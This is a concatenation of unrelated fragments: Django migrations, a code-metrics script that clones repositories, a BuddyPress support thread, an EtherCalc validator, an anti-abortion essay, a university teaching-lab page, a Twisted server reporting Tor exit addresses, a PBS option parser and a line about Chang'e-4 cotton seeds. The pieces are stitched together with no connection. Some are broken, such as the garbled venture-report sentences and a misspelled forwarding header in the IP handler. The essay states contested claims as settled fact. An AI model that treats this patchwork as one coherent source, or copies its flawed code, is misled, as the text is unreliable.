'Meta': {'object_name': 'GPlace', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'international_phone_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'local_phone_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'rating': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'types': ('mobiletrans.mtlocation.fields.SeparatedValuesField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'vicinity': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.hospital': {
'Meta': {'object_name': 'Hospital', '_ormbases': [u'mtlocation.Location']},
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.landmark': {
'Meta': {'object_name': 'Landmark', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'architect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'build_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'landmark_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.library': {
'Meta': {'object_name': 'Library', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hours': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.location': {
'Meta': {'object_name': 'Location'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'point': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '255', 'populate_from': 'None', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'mtlocation.neighborhood': {
'Meta': {'object_name': 'Neighborhood', '_ormbases': [u'mtlocation.Region']},
'long_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
u'region_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Region']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.region': {
'Meta': {'object_name': 'Region'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'area': ('django.contrib.gis.db.models.fields.PolygonField', [], {}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '255', 'populate_from': 'None', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'mtlocation.transitroute': {
'Meta': {'object_name': 'TransitRoute'},
'color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'long_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'route_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'text_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'})
},
u'mtlocation.transitstop': {
'Meta': {'object_name': 'TransitStop', '_ormbases': [u'mtlocation.Location']},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'location_type': ('django.db.models.fields.IntegerField', [], {}),
'route': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['mtlocation.TransitRoute']", 'null': 'True', 'blank': 'True'}),
'stop_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'stop_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.zipcode': {
'Meta': {'object_name': 'Zipcode', '_ormbases': [u'mtlocation.Region']},
u'region_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Region']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['mtlocation']
|
Kennesaw State University School of Music presents Jazz Ensembles.
"Jazz Ensembles" (2014). School of Music Concert Programs. 406. |
import json
import os
import subprocess
import git
import pandas
import shutil
from git import Repo
from shared_constants import data_dir, repo_candidates_filename
temp_repo_dir = "temp-repo"
code_metrics_file = "code-metrics.csv"
code_metrics_folder = "code-metrics"
def read_json(filename):
print("reading result from {}/{}".format(data_dir, filename))
with open("{}/{}.json".format(data_dir, filename), "r") as file:
data = json.load(file)
return data
def main():
# for all repos
candidate_repos = read_json(repo_candidates_filename)
# create the folder where to store the code metrics
if not os.path.exists("{}/{}".format(data_dir, code_metrics_folder)):
os.makedirs("{}/{}".format(data_dir, code_metrics_folder))
metrics = None
for i in range(0, len(candidate_repos)):
# for i in range(0, 10):
# create the folder where to store the repos temporarily
if not os.path.exists(temp_repo_dir):
os.makedirs(temp_repo_dir)
candidate_repo = candidate_repos[i]
# download repo
git_url = candidate_repo["html_url"]
repo_name = candidate_repo["name"]
print("============================================")
print("cloning repository {}".format(repo_name))
try:
Repo.clone_from(git_url, temp_repo_dir)
except git.exc.GitCommandError:
print("error cloning repository")
continue
# calculate code metrics on last snapshot
print("calculating code metrics")
repo_id = candidate_repo["id"]
output_file = "{}/{}/{}-{}".format(data_dir, code_metrics_folder, repo_id, code_metrics_file)
if not compute_metrics(output_file):
continue
temp_frame = prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name)
if metrics is None:
metrics = temp_frame
else:
metrics = pandas.concat([metrics, temp_frame], ignore_index=True)
print("save data to csv")
metrics.to_csv("{}/final-{}".format(data_dir, code_metrics_file))
shutil.rmtree(temp_repo_dir)
def compute_metrics(output_file):
# e.g "Exception in thread "main" java.lang.NullPointerException..."
# java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar temp-repo/ data/36057260-code-metrics.csv
# subprocess.run("java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar {} {}"
# .format(temp_repo_dir, output_file), shell=True)
try:
subprocess.run(
" ".join(
["java", "-jar", "ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar", temp_repo_dir, output_file]
),
shell=True, check=True,
timeout=60 * 10
)
except subprocess.CalledProcessError:
print("exception analysing the repository - skipping")
shutil.rmtree(temp_repo_dir)
return False
except subprocess.TimeoutExpired:
print("timeout analysing the repository - skipping")
shutil.rmtree(temp_repo_dir)
return False
return True
def prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name):
# analyse code quality vs stars and num contributors
print("preparing data")
metrics_raw = pandas.read_csv(output_file)
metrics_raw.pop("file")
metrics_raw.pop("class")
metrics_raw.pop("type")
# for each metric compute mean, median, Q1, and Q3
mean = metrics_raw.mean().rename(lambda x: "average_{}".format(x))
median = metrics_raw.median().rename(lambda x: "median_{}".format(x))
q1 = metrics_raw.quantile(q=0.25).rename(lambda x: "Q1_{}".format(x))
q3 = metrics_raw.quantile(q=0.75).rename(lambda x: "Q3_{}".format(x))
temp_frame = pandas.DataFrame(pandas.concat([mean, median, q1, q3])).T
temp_frame['id'] = repo_id
temp_frame['name'] = repo_name
temp_frame['stars'] = candidate_repo["stargazers_count"]
temp_frame['contributors_total'] = candidate_repo["num_contributors"]
return temp_frame
if __name__ == '__main__':
main()
|
I installed the latest version of wp and bp profile search.
When I type something into the form (for example field “Name”) the result members page always shows all members and does not filter with the search criteria.
The search criteria (Name: asdlkjdsakjladsjklsdalkj) is shown at the result page but the member list is not filtered with this criteria (Name == asdlkjdsakjladsjklsdalkj).
Does anyone have an idea what could went wrong?
Are you using the default BP theme? And if not, did you check question 2 in FAQ version 3.3?
My theme is a child of the bp-default theme. I also copied this file into the child theme but it did not help.
Thank you for your help – mail was sent!
Thanks to Andrea the problem was located. The “Buddypress Friends Online” – Plugin causes an error in the bp profile search plugin.
I have the same problem. But I need both: “BP Profile Search” and “Buddypress Friends Online”. Any suggestion ?
If you wish to fix “BuddyPress Friends On-Line” yourself, you can find the instructions in my Incompatible plugins page.
Andrea Tarantini, THAKS, it works now !!!
The topic ‘search result always shows all members’ is closed to new replies. |
from validator import Validator
from collections import defaultdict
import re
class EtherValidator(Validator):
def __init__(self, rule):
self.corpus = rule[0]
self.doc = rule[1]
self.domain = rule[2]
self.name = rule[3]
self.operator = rule[4]
self.argument = rule[5]
def _apply_exists(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) == 0:
report += "Column named '" + self.name + "' not found<br/>"
return report, tooltip, cells
def _apply_doesntexist(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) > 0:
report += "Columns named '" + self.name + "' are not allowed<br/>"
cells += [letter + "1" for letter in col_letters]
return report, tooltip, cells
def _apply_span_equals_number(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) == 0:
report += "Column named " + self.name + " not found<br/>"
return report, tooltip, cells
for letter in col_letters:
for cell in parsed_ether[letter]:
if cell.row == "1":
continue
if self.argument == "1":
if cell.span != "1":
report += "Cell " + cell.col + cell.row + ": span is not 1<br/>"
cells.append(cell.col + cell.row)
else:
if cell.span != "" and cell.span != self.argument:
report += "Cell " + cell.col + cell.row + ": span is not " + self.argument + "<br/>"
cells.append(cell.col + cell.row)
return report, tooltip, cells
def _apply_regex(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
for letter in col_letters:
for cell in parsed_ether[letter]:
if cell.row == "1":
continue
match = re.search(self.argument, cell.content)
if match is None:
report += ("Cell " + cell.col + cell.row
+ ": content does not match pattern " + self.argument + "<br/>")
tooltip += ("Cell " + cell.col + cell.row + ":<br/>"
+ "Content: " + cell.content + "<br/>"
+ "Pattern: " + self.argument + "<br/>")
cells.append(cell.col + cell.row)
return report, tooltip, cells
def _binary_op_check_cols_exist(self, colmap):
name_letters = colmap[self.name]
arg_letters = colmap[self.argument]
if len(name_letters) == 0:
if self.operator != "==":
return "Column named " + self.name + " not found<br/>"
if len(arg_letters) == 0:
if self.operator != "==":
return "Column named " + self.argument + " not found<br/>"
return ""
def _binary_op_setup(self, parsed_ether):
colmap = parsed_ether['__colmap__'] # name -> list of col letters
name_letters = colmap[self.name]
arg_letters = colmap[self.argument]
name_tuples = defaultdict(list)
arg_tuples = defaultdict(list)
start_rows = defaultdict(list)
all_rows = []
for letter in name_letters:
for cell in parsed_ether[letter]:
start_rows[letter].append(cell.row)
# "de-merge" cell so we have an entry for every row in its span with its letter and content
for i in range(int(cell.span) or 1):
row = str(int(cell.row) + i)
name_tuples[row].append((letter, cell.content))
all_rows.append(row)
# same as above with arg_letters
for letter in arg_letters:
for cell in parsed_ether[letter]:
start_rows[letter].append(cell.row)
for i in range(int(cell.span) or 1):
row = str(int(cell.row) + i)
arg_tuples[row].append((letter, cell.content))
if row not in all_rows:
all_rows.append(row)
name_start_cells = []
name_start_rows = set() # for O(1) lookup
for letter in name_letters:
name_start_cells += [(letter, row) for row in start_rows[letter]]
name_start_rows = name_start_rows.union(set(row for row in start_rows[letter]))
arg_start_cells = []
arg_start_rows = set()
for letter in arg_letters:
arg_start_cells += [(letter, row) for row in start_rows[letter]]
arg_start_rows = arg_start_rows.union(set(row for row in start_rows[letter]))
return name_letters, arg_letters, name_tuples, arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, arg_start_cells, arg_start_rows
def _apply_subspan(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
# check to see if all cells in rhs are contained within cells on lhs
if row in arg_tuples and row not in name_tuples:
for letter, _ in arg_tuples[row]:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " must appear in the span of a cell in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_equal_span_length(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
if row == "1":
continue
name_len = len(name_tuples[row])
arg_len = len(arg_tuples[row])
if name_len > arg_len:
for letter, _ in name_tuples[row][arg_len:]:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
elif arg_len > name_len:
for letter, _ in arg_tuples[row][name_len:]:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
for letter, row in name_start_cells:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
for letter, row in arg_start_cells:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_equal_span_length_and_content(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
if row == "1":
continue
name_len = len(name_tuples[row])
arg_len = len(arg_tuples[row])
if name_len > arg_len:
for letter, _ in name_tuples[row][arg_len:]:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
elif arg_len > name_len:
for letter, _ in arg_tuples[row][name_len:]:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
for i in range(min(len(name_tuples[row]), len(arg_tuples[row]))):
name_letter, name_content = name_tuples[row][i]
arg_letter, arg_content = arg_tuples[row][i]
if arg_content != name_content and (row in start_rows[arg_letter] or row in start_rows[name_letter]):
cells.append(name_letter + row)
cells.append(arg_letter + row)
report += ("Cells " + name_letter + row
+ " and " + arg_letter + row
+ " must have equivalent content.<br/>")
for letter, row in name_start_cells:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
for letter, row in arg_start_cells:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_rule(self, parsed_ether):
if self.name is None:
return "", "", []
if self.operator == "exists":
return self._apply_exists(parsed_ether)
if self.operator == "doesntexist":
return self._apply_doesntexist(parsed_ether)
elif self.operator == "|":
return self._apply_span_equals_number(parsed_ether)
elif self.operator == "~":
return self._apply_regex(parsed_ether)
elif self.operator == ">":
return self._apply_subspan(parsed_ether)
elif self.operator == "=":
return self._apply_equal_span_length(parsed_ether)
elif self.operator == "==":
return self._apply_equal_span_length_and_content(parsed_ether)
else:
raise Exception("Unknown EtherCalc validation operator: '" + str(self.operator) + "'")
def applies(self, doc_name, doc_corpus):
if self.corpus is not None and re.search(self.corpus, doc_corpus) is None:
return False
if self.doc is not None and re.search(self.doc, doc_name) is None:
return False
return True
def validate(self, parsed_ether):
report, tooltip, cells = self._apply_rule(parsed_ether)
return {"report": report,
"tooltip": tooltip,
"cells": cells}
|
During the past quarter century, abortion has joined race and war as one of the most debatable subjects of controversy in the United States. It discusses human interaction where ethics, emotions and law come together. Abortion poses a moral, social and medical dilemma that faces many individuals to create an emotional and violent atmosphere. Abortion stops the beating of an innocent child?s heart. The termination of pregnancy before the fetus is capable of independent life can either be spontaneous or induced. When abortion occurs spontaneously, it is called a miscarriage. However, when the loss of a fetus is caused intentionally, it is regarded as a moral issue. Abortion destroys the lives of helpless, innocent children and is illegal in many countries.
People must no longer ignore the scientific evidence that life begins at the moment of conception. We can no longer ignore the medical and emotional problems an abortion causes women. People must stop denying the facts about the procedure, and start hearing the silent screams of an unborn child. |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('oj_core', '0008_userstatus_solved_problems'),
]
operations = [
migrations.AlterField(
model_name='status',
name='memory',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='status',
name='result',
field=models.PositiveSmallIntegerField(default=10),
),
migrations.AlterField(
model_name='status',
name='score',
field=models.PositiveSmallIntegerField(default=0),
),
migrations.AlterField(
model_name='status',
name='time',
field=models.FloatField(default=0),
),
migrations.AlterField(
model_name='status',
name='user',
field=models.ForeignKey(to='oj_core.UserStatus', null=True, on_delete=django.db.models.deletion.SET_NULL),
),
]
|
The Teaching Innovation Learning Lab (TILL) is a space for faculty-driven exploration and testing of innovative teaching methods that will drive success for the 21st century student.
The Teaching Innovation Learning Lab (TILL) cultivates and supports the scholarly development, investigation, and dissemination of innovative and evidence-based teaching at the University of Louisville through faculty-led experimentation, idea exchange, and cross-disciplinary collaboration.
The TILL is widely recognized as an effective professional development resource for innovative teaching and student success.
The TILL encourages, models, and supports the scholarly investigation of teaching and learning (SoTL).
UofL teachers implement and promote evidence-based teaching practices.
UofL teachers feel connected to an interdisciplinary and collaborative teaching and learning community of practice.
UofL teachers foster student engagement, learning, and success.
UofL teachers demonstrate confidence in and derive satisfaction from their teaching experiences.
The TILL classroom is a technology-rich active learning environment that is designed to foster student engagement and active learning. The moveable tables, node chairs and multiple monitors allow instructors and students to interact, teach and learn more creatively than ever before.
The TILL features three collaborate rooms outfitted with the same wireless collaboration technology found in the classroom, making them perfect for small group meetings. Reservations to use the collaborate rooms are encouraged, but drop ins are welcome so long as space is available.
The recording studio includes everything instructors need to record audio or video material for their courses, and support staff is always on hand. Reservations to use the recording studio are encouraged, but drop ins are also welcome.
Email us to reserve the recording studio.
The living room is perfect for one-on-one meetings, reading groups, or a satellite work space. Come on in and grab a cup of coffee! |
#!/usr/bin/env python
import json
from twisted.web import server, resource
from twisted.internet import reactor
from common import Exitaddr, options
DEFAULT_PORT = 8080
exitaddr_results = None
def addHeader(request):
h = request.responseHeaders
h.addRawHeader(b"content-type", b"application/json")
class Res(resource.Resource):
def getChild(self, name, request):
''' handle trailing / '''
if name == '':
return self
return resource.Resource.getChild(self, name, request)
class Exits(Res):
''' json dump of our state '''
def render_GET(self, request):
addHeader(request)
return json.dumps(exitaddr_results, indent=4)
class IP(Res):
''' json response with the remote host ip '''
def render_GET(self, request):
host = request.transport.getPeer().host
header = request.received_headers.get("X-Forwared-For", None)
if header is not None:
host = header.split(',')[-1].strip()
response = {"IP": host}
addHeader(request)
return json.dumps(response, indent=4)
class Ser(Exitaddr):
def __init__(self, *args, **kwargs):
Exitaddr.__init__(self, *args, **kwargs)
self.fld = 0
def passed(self, result):
pass
def failed(self, result):
print result[0].id_hex[1:], "failed"
self.fld += 1
def finished(self, results):
global exitaddr_results
res = {}
for key in results.keys():
res[key] = results[key][1]
exitaddr_results = res
print ""
print "failed", self.fld
print "exit list ready!"
def main():
root = resource.Resource()
root.putChild("exits", Exits())
root.putChild("ip", IP())
reactor.listenTCP(DEFAULT_PORT, server.Site(root))
# sample a few for now
options.num_exits = 25
exitaddr = Ser(reactor, options)
print "listening on", DEFAULT_PORT
exitaddr.start()
if __name__ == "__main__":
main()
|
their Q2 2011 Bay Area Venture Deal Terms report.
VC Experts' coverage of that report can be found at Q2 2011 Bay Area Venture Deal Terms.
consistencies in terms with both areas, and also some differences. |
#!/usr/bin/env python
'''class for parsing PBS options'''
from argparse import ArgumentParser
import os, re, validate_email
from vsc.event_logger import EventLogger
from vsc.utils import walltime2seconds, size2bytes
from vsc.utils import InvalidWalltimeError
class PbsOptionParser(EventLogger):
'''Parser for PBS options, either command line or directives'''
def __init__(self, config, event_defs, job):
'''constructor'''
super(PbsOptionParser, self).__init__(event_defs, 'global')
self._config = config
self._job = job
self._arg_parser = ArgumentParser()
self._arg_parser.add_argument('-A')
self._arg_parser.add_argument('-e')
self._arg_parser.add_argument('-j')
self._arg_parser.add_argument('-k')
self._arg_parser.add_argument('-l', action='append')
self._arg_parser.add_argument('-m')
self._arg_parser.add_argument('-M')
self._arg_parser.add_argument('-N')
self._arg_parser.add_argument('-o')
self._arg_parser.add_argument('-q')
def parse_args(self, option_line):
'''parse options string'''
self._events = []
args = option_line.split()
options, rest = self._arg_parser.parse_known_args(args)
for option, value in options.__dict__.items():
if value:
self.handle_option(option, value)
if self._job.queue and not self._job._is_time_limit_set:
walltime_limit = self.get_queue_limit(self._job.queue)
if walltime_limit:
self._job._resource_specs['walltime'] = walltime_limit
def handle_option(self, option, value):
'''option dispatch method'''
if option == 'A':
self.check_A(value.strip())
elif option == 'e' or option == 'o':
self.check_oe(value.strip(), option)
elif option == 'j':
self.check_j(value.strip())
elif option == 'k':
self.check_k(value.strip())
elif option == 'l':
self.check_l(value)
elif option == 'm':
self.check_m(value.strip())
elif option == 'M':
self.check_M(value.strip())
elif option == 'N':
self.check_N(value.strip())
elif option == 'q':
self.check_q(value.strip())
def check_A(self, val):
'''check whether a valid project name was specified'''
if re.match(r'[A-Za-z]\w*$', val):
self._job.project = val
else:
self.reg_event('invalid_project_name', {'val': val})
def get_queue_limit(self, queue_name):
'''get the maximum walltime for the queue specified'''
for queue_def in self._config['queue_definitions']:
if queue_def['name'] == queue_name:
return int(queue_def['walltime_limit'])
return None
def check_q(self, val):
'''check whether a valid queue name was specified'''
if re.match(r'[A-Za-z]\w*$', val):
self._job.queue = val
else:
self.reg_event('invalid_queue_name', {'val': val})
def check_j(self, val):
'''check -j option, vals can be oe, eo, n'''
if val == 'oe' or val == 'eo' or val == 'n':
self._job.join = val
else:
self.reg_event('invalid_join', {'val': val})
def check_k(self, val):
'''check -k option, val can be e, o, oe, eo, or n'''
if re.match(r'^[eo]+$', val) or val == 'n':
self._job.keep = val
else:
self.reg_event('invalid_keep', {'val': val})
def check_m(self, val):
'''check -m option, val can be any combination of b, e, a, or n'''
if re.match(r'^[bea]+$', val) or val == 'n':
self._job.mail_events = val
else:
self.reg_event('invalid_mail_event', {'val': val})
def check_M(self, val):
'''check -M option'''
self._job.mail_addresses = val.split(',')
uid = os.getlogin()
for address in self._job.mail_addresses:
if (not validate_email.validate_email(address) and
address != uid):
self.reg_event('invalid_mail_address', {'address': address})
def check_N(self, val):
'''check -N is a valid job name'''
if re.match(r'[A-Za-z]\w{,14}$', val):
self._job.name = val
else:
self.reg_event('invalid_job_name', {'val': val})
def check_time_res(self, val, resource_spec):
'''check a time resource'''
attr_name, attr_value = val.split('=')
try:
seconds = walltime2seconds(attr_value)
resource_spec[attr_name] = seconds
except InvalidWalltimeError:
self.reg_event('invalid_{0}_format'.format(attr_name),
{'time': attr_value})
def check_generic_res(self, val, resource_spec):
'''check a generic resource'''
attr_name, attr_value = val.split('=')
if attr_name == 'feature':
resource_spec[attr_name] = attr_value.split(':')
else:
resource_spec[attr_name] = attr_value
def check_mem_res(self, val, resource_spec):
'''check memory resource'''
attr_name, attr_value = val.split('=')
match = re.match(r'(\d+)([kmgt])?[bw]', attr_value)
if match:
amount = int(match.group(1))
order = match.group(2)
resource_spec[attr_name] = size2bytes(amount, order)
else:
self.reg_event('invalid_{0}_format'.format(attr_name),
{'size': attr_value})
def check_nodes_res(self, val, resource_spec):
'''check nodes resource'''
_, attr_value = val.split('=', 1)
# if present, multiple node specifications are separated by '+'
node_spec_strs = attr_value.split('+')
node_specs = []
for node_spec_str in node_spec_strs:
node_spec = {'features': []}
spec_strs = node_spec_str.split(':')
# if a node spec starts with a number, that's the number of nodes,
# otherwise it can be a hostname or a feature, but number of nodes is 1
if spec_strs[0].isdigit():
node_spec['nodes'] = int(spec_strs[0])
else:
node_spec['nodes'] = 1
# note that this might be wrong, it may actually be a feature, but
# that is a semantic check, not syntax
node_spec['host'] = spec_strs[0]
# now deal with the remaining specifications, ppn, gpus and features
for spec_str in spec_strs[1:]:
if (spec_str.startswith('ppn=') or
spec_str.startswith('gpus=')):
key, value = spec_str.split('=')
if value.isdigit():
node_spec[key] = int(value)
else:
self.reg_event('{0}_no_number'.format(key),
{'number': value})
else:
node_spec['features'].append(spec_str)
node_specs.append(node_spec)
resource_spec['nodes'] = node_specs
def check_procs_res(self, val, resource_spec):
'''check procs resource specification'''
attr_name, attr_value = val.split('=')
if attr_name in resource_spec:
self.reg_event('multiple_procs_specs')
if not attr_value.isdigit():
self.reg_event('non_integer_procs', {'procs': attr_value})
resource_spec[attr_name] = int(attr_value)
def check_l(self, vals):
'''check and handle resource options'''
resource_spec = {}
has_default_pmem = True
# there can be multiple -l options on one line or on the command line
for val_str in (x.strip() for x in vals):
# values can be combined by using ','
for val in (x.strip() for x in val_str.split(',')):
if (val.startswith('walltime=') or
val.startswith('cput=') or
val.startswith('pcput=')):
self.check_time_res(val, resource_spec)
self._job._is_time_limit_set = True
elif (val.startswith('mem=') or val.startswith('pmem=') or
val.startswith('vmem=') or val.startswith('pvmem=')):
self.check_mem_res(val, resource_spec)
if val.startswith('pmem='):
has_default_pmem = False
elif val.startswith('nodes='):
self.check_nodes_res(val, resource_spec)
elif val.startswith('procs='):
self.check_procs_res(val, resource_spec)
elif (val.startswith('partition=') or
val.startswith('feature') or
val.startswith('qos')):
self.check_generic_res(val, resource_spec)
else:
self.reg_event('unknown_resource_spec', {'spec': val})
self._job.add_resource_specs(resource_spec)
self._job._has_default_pmem = has_default_pmem
def check_oe(self, val, option):
'''check for valid -o or -e paths'''
if ':' in val:
host, path = val.split(':', 1)
else:
host = None
path = val
if option == 'e':
self._job.set_error(path, host)
else:
self._job.set_output(path, host)
|
China has taken one of the biggest steps in space exploration. Cotton seeds brought to the Moon aboard China’s Chang’e-4 mission have sprouted, marking the first time plants have grown on the lunar surface.
